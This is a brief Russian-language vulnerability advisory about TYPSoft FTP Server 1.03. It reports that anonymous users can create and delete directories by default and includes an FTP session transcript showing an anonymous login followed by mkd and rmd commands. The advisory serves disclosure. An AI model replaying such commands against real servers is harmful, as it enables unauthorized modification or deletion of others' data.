Уязвимость конфигурации обнаружена в TYPSoft FTP Server. Удаленный авторизованный пользователь, включая анонимного пользователя, может создавать и удалять директории на FTP сервере. 

DWC Gr0up сообщилf, что по умолчанию удаленный авторизованный пользователь может вызвать команды
mkd и rmd для создания и удаления директорий в пределах FTP сервера. Пример: 

220 TYPSoft FTP Server 1.03 ready...
user anonymous
331 Password required for anonymous.
pass anonymoys@127.0.0.1
230 User anonymous logged in.
pwd
257 "/C:/TEMP/" is current directory.
mkd subj
257 '/C:/TEMP/subj': directory created.
rmd subj
250 '/C:/TEMP/subj': directory removed.

Уязвимость обнаружена в TYPSoft FTP Server 1.03.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии